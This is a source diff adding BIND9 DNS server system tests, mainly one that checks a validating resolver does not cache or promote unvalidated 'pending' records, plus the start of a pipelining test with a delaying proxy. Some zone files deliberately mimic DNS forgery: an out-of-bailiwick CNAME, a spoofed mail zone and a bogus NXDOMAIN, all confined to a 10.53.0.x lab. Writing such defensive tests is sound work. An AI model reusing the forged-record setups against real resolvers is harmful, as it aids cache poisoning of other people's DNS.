check_interfaces" + echo " @${SHELL} ./run.sh -p $port $directory 2>&1 | tee test.output.$directory" + port=`expr $port + 100` +done diff --git a/bin/tests/system/pending/clean.sh b/bin/tests/system/pending/clean.sh new file mode 100644 index 0000000..89a4b5b --- /dev/null +++ b/bin/tests/system/pending/clean.sh @@ -0,0 +1,27 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -rf */*.signed +rm -rf */*.jnl +rm -rf */K* +rm -rf */dsset-* +rm -rf */named.memstats +rm -rf */named.run +rm -rf */trusted.conf +rm -rf ns1/root.db +rm -rf ns2/example.db +rm -rf ns2/example.com.db +rm -rf nsupdate.out.test +rm -f ns*/named.lock +rm -f ns*/named.conf +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/pending/ns1/named.conf.in b/bin/tests/system/pending/ns1/named.conf.in new file mode 100644 index 0000000..f09c3c9 --- /dev/null +++ b/bin/tests/system/pending/ns1/named.conf.in @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "trusted.conf"; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; diff --git a/bin/tests/system/pending/ns1/root.db.in b/bin/tests/system/pending/ns1/root.db.in new file mode 100644 index 0000000..fe7fe92 --- /dev/null +++ b/bin/tests/system/pending/ns1/root.db.in @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 30 +. IN SOA marka.isc.org. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 +example.com. NS ns2.example.com. +ns2.example.com. A 10.53.0.2 +hostile. NS ns3.hostile. +ns3.hostile. A 10.53.0.3 +nice.good. A 10.10.10.10 diff --git a/bin/tests/system/pending/ns1/sign.sh b/bin/tests/system/pending/ns1/sign.sh new file mode 100644 index 0000000..c29ebe2 --- /dev/null +++ b/bin/tests/system/pending/ns1/sign.sh @@ -0,0 +1,36 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=. +infile=root.db.in +zonefile=root.db + +(cd ../ns2 && $SHELL -e sign.sh ) + +cp ../ns2/dsset-example$TP . +cp ../ns2/dsset-example.com$TP . + +keyname1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) +keyname2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -f KSK -n zone $zone) +cat $infile $keyname1.key $keyname2.key > $zonefile + +$SIGNER -g -o $zone $zonefile > /dev/null + +# Configure the resolving server with a static key. +keyfile_to_static_ds $keyname2 > trusted.conf +cp trusted.conf ../ns2/trusted.conf +cp trusted.conf ../ns3/trusted.conf +cp trusted.conf ../ns4/trusted.conf diff --git a/bin/tests/system/pending/ns2/example.com.db.in b/bin/tests/system/pending/ns2/example.com.db.in new file mode 100644 index 0000000..ee3a1b8 --- /dev/null +++ b/bin/tests/system/pending/ns2/example.com.db.in @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 30 +@ IN SOA mname1. . ( + 2009110300 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 + MX 10 mail +ns2 A 10.53.0.2 +mail A 192.0.2.2 + AAAA 2001:db8::2 +pending-ok A 192.0.2.2 +pending-ng A 192.0.2.102 +removed A 10.9.8.7 diff --git a/bin/tests/system/pending/ns2/example.db.in b/bin/tests/system/pending/ns2/example.db.in new file mode 100644 index 0000000..5b42e2a --- /dev/null +++ b/bin/tests/system/pending/ns2/example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 30 +$ORIGIN example. +@ IN SOA mname1. . ( + 2009110300 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 + MX 10 mail +ns2 A 10.53.0.2 +mail A 10.0.0.2 +bad CNAME nice.good. +worse A 6.6.6.6 diff --git a/bin/tests/system/pending/ns2/forgery.db b/bin/tests/system/pending/ns2/forgery.db new file mode 100644 index 0000000..fbf42bc --- /dev/null +++ b/bin/tests/system/pending/ns2/forgery.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 30 +$ORIGIN good. +@ IN SOA mname1. . ( + 2009110300 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + +nice.good. CNAME worse.example. diff --git a/bin/tests/system/pending/ns2/named.conf.in b/bin/tests/system/pending/ns2/named.conf.in new file mode 100644 index 0000000..59824df --- /dev/null +++ b/bin/tests/system/pending/ns2/named.conf.in @@ -0,0 +1,51 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +include "trusted.conf"; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db.signed"; +}; + +zone "example.com" { + type primary; + file "example.com.db.signed"; + allow-update { 10.53.0.0/16; }; +}; + +zone "good" { + type primary; + file "forgery.db"; + allow-query { any; }; +}; diff --git a/bin/tests/system/pending/ns2/sign.sh b/bin/tests/system/pending/ns2/sign.sh new file mode 100644 index 0000000..df408f8 --- /dev/null +++ b/bin/tests/system/pending/ns2/sign.sh @@ -0,0 +1,34 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +for domain in example example.com; do + zone=${domain}. + infile=${domain}.db.in + zonefile=${domain}.db + + keyname1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -n zone $zone) + keyname2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -f KSK -n zone $zone) + + cat $infile $keyname1.key $keyname2.key > $zonefile + + $SIGNER -3 bebe -o $zone $zonefile > /dev/null +done + +# remove "removed" record from example.com, causing the server to +# send an apparently-invalid NXDOMAIN +sed '/^removed/d' example.com.db.signed > example.com.db.new +rm -f example.com.db.signed +mv example.com.db.new example.com.db.signed diff --git a/bin/tests/system/pending/ns3/hostile.db b/bin/tests/system/pending/ns3/hostile.db new file mode 100644 index 0000000..a199922 --- /dev/null +++ b/bin/tests/system/pending/ns3/hostile.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 30 +@ IN SOA mname1. . ( + 2009110500 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns3 + MX 10 mail.example. +ns3 A 10.53.0.3 diff --git a/bin/tests/system/pending/ns3/mail.example.db b/bin/tests/system/pending/ns3/mail.example.db new file mode 100644 index 0000000..77eb731 --- /dev/null +++ b/bin/tests/system/pending/ns3/mail.example.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 30 +@ IN SOA mname1. . ( + 2009110300 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ NS ns3 +ns3 A 10.53.0.3 +;mail A 10.0.0.2 // the correct record +@ A 10.0.0.3 diff --git a/bin/tests/system/pending/ns3/named.conf.in b/bin/tests/system/pending/ns3/named.conf.in new file mode 100644 index 0000000..29afd19 --- /dev/null +++ b/bin/tests/system/pending/ns3/named.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +include "trusted.conf"; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion no; + notify no; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "mail.example" { + type primary; + file "mail.example.db"; +}; + +zone "hostile" { + type primary; + file "hostile.db"; +}; diff --git a/bin/tests/system/pending/ns4/named.conf.in b/bin/tests/system/pending/ns4/named.conf.in new file mode 100644 index 0000000..6be9085 --- /dev/null +++ b/bin/tests/system/pending/ns4/named.conf.in @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "trusted.conf"; + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; diff --git a/bin/tests/system/pending/setup.sh b/bin/tests/system/pending/setup.sh new file mode 100644 index 0000000..2d52f1c --- /dev/null +++ b/bin/tests/system/pending/setup.sh @@ -0,0 +1,24 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf + +cd ns1 && $SHELL -e sign.sh diff --git a/bin/tests/system/pending/tests.sh b/bin/tests/system/pending/tests.sh new file mode 100644 index 0000000..049172f --- /dev/null +++ b/bin/tests/system/pending/tests.sh @@ -0,0 +1,199 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +# replace_data dname RR old_data new_data +replace_data() +{ + if [ $# -ne 4 ]; then + echo_i "unexpected input for replace_data" + return 1 + fi + + _dname=$1 + _rr=$2 + _olddata=$3 + _newdata=$4 + + _ret=0 + $NSUPDATE -d <<END >> nsupdate.out.test 2>&1 || _ret=1 +server 10.53.0.2 ${PORT} +update delete ${_dname} 30 ${_rr} ${_olddata} +update add ${_dname} 30 ${_rr} ${_newdata} +send +END + + if [ $_ret != 0 ]; then + echo_i "failed to update the test data" + return 1 + fi + + return 0 +} + +status=0 +n=0 + +DIGOPTS="+short +tcp -p ${PORT}" +DIGOPTS_CD="$DIGOPTS +cd" + +echo_i "Priming cache." +ret=0 +expect="10 mail.example." +ans=`$DIG $DIGOPTS_CD @10.53.0.4 hostile MX` || ret=1 +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +echo_i "Checking that bogus additional is not returned with +CD." +ret=0 +expect="10.0.0.2" +ans=`$DIG $DIGOPTS_CD @10.53.0.4 mail.example A` || ret=1 +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +# +# Prime cache with pending additional records. These should not be promoted +# to answer. +# +echo_i "Priming cache (pending additional A and AAAA)" +ret=0 +expect="10 mail.example.com." +ans=`$DIG $DIGOPTS @10.53.0.4 example.com MX` || ret=1 +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +echo_i "Replacing pending A" +ret=0 +replace_data mail.example.com. A 192.0.2.2 192.0.2.3 || ret=1 +status=`expr $status + $ret` + +echo_i "Replacing pending AAAA" +ret=0 +replace_data mail.example.com. AAAA 2001:db8::2 2001:db8::3 || ret=1 +status=`expr $status + $ret` + +echo_i "Checking updated data to be returned (without CD)" +ret=0 +expect="192.0.2.3" +ans=`$DIG $DIGOPTS @10.53.0.4 mail.example.com A` || ret=1 +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +echo_i "Checking updated data to be returned (with CD)" +ret=0 +expect="2001:db8::3" +ans=`$DIG $DIGOPTS_CD @10.53.0.4 mail.example.com AAAA` || ret=1 +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +# +# Prime cache with a pending answer record. It can be returned (without +# validation) with +CD. +# +echo_i "Priming cache (pending answer)" +ret=0 +expect="192.0.2.2" +ans=`$DIG $DIGOPTS_CD @10.53.0.4 pending-ok.example.com A` || ret=1 +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +echo_i "Replacing pending data" +ret=0 +replace_data pending-ok.example.com. A 192.0.2.2 192.0.2.3 || ret=1 +status=`expr $status + $ret` + +echo_i "Confirming cached pending data to be returned with CD" +ret=0 +expect="192.0.2.2" +ans=`$DIG $DIGOPTS_CD @10.53.0.4 pending-ok.example.com A` || ret=1 +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +# +# Prime cache with a pending answer record. It should not be returned +# to no-DNSSEC clients. +# +echo_i "Priming cache (pending answer)" +ret=0 +expect="192.0.2.102" +ans=`$DIG $DIGOPTS_CD @10.53.0.4 pending-ng.example.com A` || ret=1 +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +echo_i "Replacing pending data" +ret=0 +replace_data pending-ng.example.com. A 192.0.2.102 192.0.2.103 || ret=1 +status=`expr $status + $ret` + +echo_i "Confirming updated data returned, not the cached one, without CD" +ret=0 +expect="192.0.2.103" +ans=`$DIG $DIGOPTS @10.53.0.4 pending-ng.example.com A` || ret=1 +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +# +# Try to fool the resolver with an out-of-bailiwick CNAME +# +echo_i "Trying to Prime out-of-bailiwick pending answer with CD" +ret=0 +expect="10.10.10.10" +ans=`$DIG $DIGOPTS_CD @10.53.0.4 bad.example. A` || ret=1 +ans=`echo $ans | awk '{print $NF}'` +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +echo_i "Confirming the out-of-bailiwick answer is not cached or reused with CD" +ret=0 +expect="10.10.10.10" +ans=`$DIG $DIGOPTS_CD @10.53.0.4 nice.good. A` || ret=1 +ans=`echo $ans | awk '{print $NF}'` +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +# +# Make sure the resolver doesn't cache bogus NXDOMAIN +# +echo_i "Trying to Prime bogus NXDOMAIN" +ret=0 +expect="SERVFAIL" +ans=`$DIG +tcp -p ${PORT} @10.53.0.4 removed.example.com. A` || ret=1 +ans=`echo $ans | sed 's/^.*status: \([A-Z][A-Z]*\).*$/\1/'` +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +echo_i "Confirming the bogus NXDOMAIN was not cached" +ret=0 +expect="SERVFAIL" +ans=`$DIG +tcp -p ${PORT} @10.53.0.4 removed.example.com. A` || ret=1 +ans=`echo $ans | sed 's/^.*status: \([A-Z][A-Z]*\).*$/\1/'` +test "$ans" = "$expect" || ret=1 +test $ret = 0 || echo_i "failed, got '$ans', expected '$expect'" +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/pipelined/Makefile.in b/bin/tests/system/pipelined/Makefile.in new file mode 100644 index 0000000..fe88628 --- /dev/null +++ b/bin/tests/system/pipelined/Makefile.in @@ -0,0 +1,49 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +srcdir = @srcdir@ +VPATH = @srcdir@ +top_srcdir = @top_srcdir@ + +VERSION=@BIND9_VERSION@ + +@BIND9_MAKE_INCLUDES@ + +CINCLUDES = ${DNS_INCLUDES} ${ISC_INCLUDES} \ + ${OPENSSL_CFLAGS} + +CDEFINES = +CWARNINGS = + +DNSLIBS = ../../../../lib/dns/libdns.@A@ @NO_LIBTOOL_DNSLIBS@ +ISCLIBS = ../../../../lib/isc/libisc.@A@ @NO_LIBTOOL_ISCLIBS@ + +DNSDEPLIBS = ../../../../lib/dns/libdns.@A@ +ISCDEPLIBS = ../../../../lib/isc/libisc.@A@ + +DEPLIBS = ${DNSDEPLIBS} ${ISCDEPLIBS} + +LIBS = ${DNSLIBS} ${ISCLIBS} @LIBS@ + +TARGETS = pipequeries@EXEEXT@ + +SRCS = pipequeries.c + +@BIND9_MAKE_RULES@ + +all: pipequeries@EXEEXT@ + +pipequeries@EXEEXT@: pipequeries.@O@ ${DEPLIBS} + ${LIBTOOL_MODE_LINK} ${PURIFY} ${CC} ${CFLAGS} ${LDFLAGS} -o $@ pipequeries.@O@ ${LIBS} + +clean distclean:: + rm -f ${TARGETS} + diff --git a/bin/tests/system/pipelined/ans5/ans.py b/bin/tests/system/pipelined/ans5/ans.py new file mode 100644 index 0000000..bac5ed3 --- /dev/null +++ b/bin/tests/system/pipelined/ans5/ans.py @@ -0,0 +1,212 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +############################################################################ +# +# This tool acts as a TCP/UDP proxy and delays all incoming packets by 500 +# milliseconds. +# +# We use it to check pipelining - a client sents 8 questions over a +# pipelined connection - that require asking a normal (examplea) and a +# slow-responding (exampleb) servers: +# a.examplea +# a.exampleb +# b.examplea +# b.exampleb +# c.examplea +# c.exampleb +# d.examplea +# d.exampleb +# +# If pipelining works properly the answers will be returned out of order +# with all answers from examplea returned first, and then all answers +# from exampleb. +# +############################################################################ + +from __future__ import print_function + +import datetime +import os +import select +import signal +import socket +import sys +import time +import threading +import struct + +DELAY = 0.5 +THREADS = [] + + +def log(msg): + print(datetime.datetime.now().strftime("%d-%b-%Y %H:%M:%S.%f ") + msg) + + +def sigterm(*_): + log("SIGTERM received, shutting down") + for thread in THREADS: + thread.close() + thread.join() + os.remove("ans.pid") + sys.exit(0) + + +class TCPDelayer(threading.Thread): + """For a given TCP connection conn we open a connection to (ip, port), + and then we delay each incoming packet by DELAY by putting it in a + queue. + In the pipelined test TCP should not be used, but it's here for + completnes. + """ + + def __init__(self, conn, ip, port): + threading.Thread.__init__(self) + self.conn = conn + self.cconn = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self.cconn.connect((ip, port)) + self.queue = [] + self.running = True + + def close(self): + self.running = False + + def run(self): + while self.running: + curr_timeout = 0.5 + try: + curr_timeout = self.queue[0][0] - time.time() + except StopIteration: + pass + if curr_timeout > 0: + if curr_timeout == 0: + curr_timeout = 0.5 + rfds, _, _ = select.select( + [self.conn, self.cconn], [], [], curr_timeout + ) + if self.conn in rfds: + data = self.conn.recv(65535) + if not data: + return + self.queue.append((time.time() + DELAY, data)) + if self.cconn in rfds: + data = self.cconn.recv(65535) + if not data == 0: + return + self.conn.send(data) + try: + while self.queue[0][0] - time.time() < 0: + _, data = self.queue.pop(0) + self.cconn.send(data) + except StopIteration: + pass + + +class UDPDelayer(threading.Thread): + """Every incoming UDP packet is put in a queue for DELAY time, then + it's sent to (ip, port). We remember the query id to send the + response we get to a proper source, responses are not delayed. + """ + + def __init__(self, usock, ip, port): + threading.Thread.__init__(self) + self.sock = usock + self.csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + self.dst = (ip, port) + self.queue = [] + self.qid_mapping = {} + self.running = True + + def close(self): + self.running = False + + def run(self): + while self.running: + curr_timeout = 0.5 + if self.queue: + curr_timeout = self.queue[0][0] - time.time() + if curr_timeout >= 0: + if curr_timeout == 0: + curr_timeout = 0.5 + rfds, _, _ = select.select( + [self.sock, self.csock], [], [], curr_timeout + ) + if self.sock in rfds: + data, addr = self.sock.recvfrom(65535) + if not data: + return + self.queue.append((time.time() + DELAY, data)) + qid = struct.unpack(">H", data[:2])[0] + log("Received a query from %s, queryid %d" % (str(addr), qid)) + self.qid_mapping[qid] = addr + if self.csock in rfds: + data, addr = self.csock.recvfrom(65535) + if not data: + return + qid = struct.unpack(">H", data[:2])[0] + dst = self.qid_mapping.get(qid) + if dst is not None: + self.sock.sendto(data, dst) + log( + "Received a response from %s, queryid %d, sending to %s" + % (str(addr), qid, str(dst)) + ) + while self.queue and self.queue[0][0] - time.time() < 0: + _, data = self.queue.pop(0) + qid = struct.unpack(">H", data[:2])[0] + log("Sending a query to %s, queryid %d" % (str(self.dst), qid)) + self.csock.sendto(data, self.dst) + + +def main(): + signal.signal(signal.SIGTERM, sigterm) + signal.signal(signal.SIGINT, sigterm) + + with open("ans.pid", "w") as pidfile: + print(os.getpid(), file=pidfile) + + listenip = "10.53.0.5" + serverip = "10.53.0.2" + + try: + port = int(os.environ["PORT"]) + except KeyError: + port = 5300 + + log("Listening on %s:%d" % (listenip, port)) + + usock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + usock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + usock.bind((listenip, port)) + thread = UDPDelayer(usock, serverip, port) + thread.start() + THREADS.append(thread) + + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sock.bind((listenip, port)) + sock.listen(1) + sock.settimeout(1) + + while True: + try: + (clientsock, _) = sock.accept() + log("Accepted connection from %s" % clientsock) + thread = TCPDelayer(clientsock, serverip, port) + thread.start() + THREADS.append(thread) + except socket.timeout: + pass + + +if __name__ == "__main__": + main() diff --git a/bin/tests/system/pipelined/clean.sh b/bin/tests/system/pipelined/clean.sh new file mode 100644 index 0000000..12c1733 --- /dev/null +++ b/bin/tests/system/pipelined/clean.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f */named.conf +rm -f */named.memstats +rm -f */named.run +rm -f raw* output* +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/pipelined/input b/bin/tests/system/pipelined/input new file mode 100644 index 0000000..485cf81 --- /dev/null +++ b/bin/tests/system/pipelined/input @@ -0,0 +1,8 @@ +a.examplea +a.exampleb +b.examplea +b.exampleb +c.examplea +c.exampleb +d.examplea +d.exampleb diff --git a/bin/tests/system/pipelined/inputb b/bin/tests/system/pipelined/inputb new file mode 100644 index 0000000..6ea367e --- /dev/null +++ b/bin/tests/system/pipelined/inputb @@ -0,0 +1,8 @@ +e.examplea +e.exampleb +f.examplea +f.exampleb +g.examplea +g.exampleb +h.examplea +h.exampleb diff --git a/bin/tests/system/pipelined/ns1/named.conf.in b/bin/tests/system/pipelined/ns1/named.conf.in new file mode 100644 index 0000000..848a022 --- /dev/null +++ b/bin/tests/system/pipelined/ns1/named.conf.in @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db"; +}; diff --git a/bin/tests/system/pipelined/ns1/root.db b/bin/tests/system/pipelined/ns1/root.db new file mode 100644 index 0000000..f2819a1 --- /dev/null +++ b/bin/tests/system/pipelined/ns1/root.db @@ -0,0 +1,27 @@ +; 